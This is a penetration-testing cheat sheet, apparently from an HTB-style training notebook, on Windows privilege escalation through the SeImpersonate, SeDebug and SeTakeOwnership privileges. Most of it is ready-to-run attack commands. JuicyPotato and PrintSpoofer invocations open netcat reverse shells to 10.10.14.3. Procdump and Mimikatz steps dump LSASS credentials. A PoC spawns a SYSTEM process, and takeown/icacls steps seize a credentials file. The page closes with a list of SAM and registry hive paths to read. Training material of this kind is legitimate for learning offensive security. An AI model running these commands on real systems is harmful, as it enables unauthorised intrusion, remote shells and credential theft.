Windows User Privileges

SeImpersonate Privilege

Attackers often abuse this privilege in the "Potato style" privescs - where a service account can SeImpersonate, but not obtain full SYSTEM level privileges.

JuicyPatato Method

https://github.com/ohpe/juicy-potato

c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *

PrintSpoofer Method

JuicyPotato doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards. However, PrintSpoofer and RoguePotato can be used to leverage the same privileges and gain NT AUTHORITY\SYSTEM level access. https://github.com/itm4n/PrintSpoofer

c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"

SeDebugPrivilege

To run a particular application or service or assist with troubleshooting, a user might be assigned the SeDebugPrivilege instead of adding the account into the administrators group.

We can use ProcDump from the SysInternals suite to leverage this privilege and dump process memory.

Dump Lsass

1 Dump lsass Process

procdump.exe -accepteula -ma lsass.exe lsass.dmp

2 Mimikatz Dump lsass Dump

# Specify Dump File
sekurlsa::minidump lsass.dmp

# Dump Creds
sekurlsa::logonpasswords

RCE

https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1

1 List Processes

tasklist /svc

2 Use PoC Script

[MyProcess]::CreateProcessFromParent(612,"c:\Windows\System32\cmd.exe","")

SeTakeOwnershipPrivilege

SeTakeOwnershipPrivilege grants a user the ability to take ownership of any "securable object," meaning Active Directory objects, NTFS files/folders, printers, registry keys, services, and processes.

https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1

1 Enable Privilege

# Import Module
Import-Module .\Enable-Privilege.ps1

# Run Script
.\EnableAllTokenPrivs.ps1

# Verify 
whoami /priv

2 Check OwnerShip File

cmd /c dir /q 'C:\Department Shares\Private\IT'

3 Taking Ownership File

takeown /f 'C:\Department Shares\Private\IT\cred.txt'

4 Confirming Ownership

 Get-ChildItem -Path 'C:\Department Shares\Private\IT\cred.txt' | select name,directory, @{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}}

5 Modify ACL on File

icacls 'C:\Department Shares\Private\IT\cred.txt' /grant htb-student:F

Interesting Files to Read

c:\inetpub\wwwwroot\web.config
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav

PreviousOS Attacks NextWindows Group Privileges

Last updated 1 year ago

hashtagSeImpersonate Privilege

hashtagJuicyPatato Method

hashtagPrintSpoofer Method

hashtagSeDebugPrivilege

hashtagDump Lsass

hashtag1 Dump lsass Process

hashtag2 Mimikatz Dump lsass Dump

hashtagRCE

hashtag1 List Processes

hashtag2 Use PoC Script

hashtagSeTakeOwnershipPrivilege

hashtag1 Enable Privilege

hashtag2 Check OwnerShip File

hashtag3 Taking Ownership File

hashtag4 Confirming Ownership

hashtag5 Modify ACL on File

hashtagInteresting Files to Read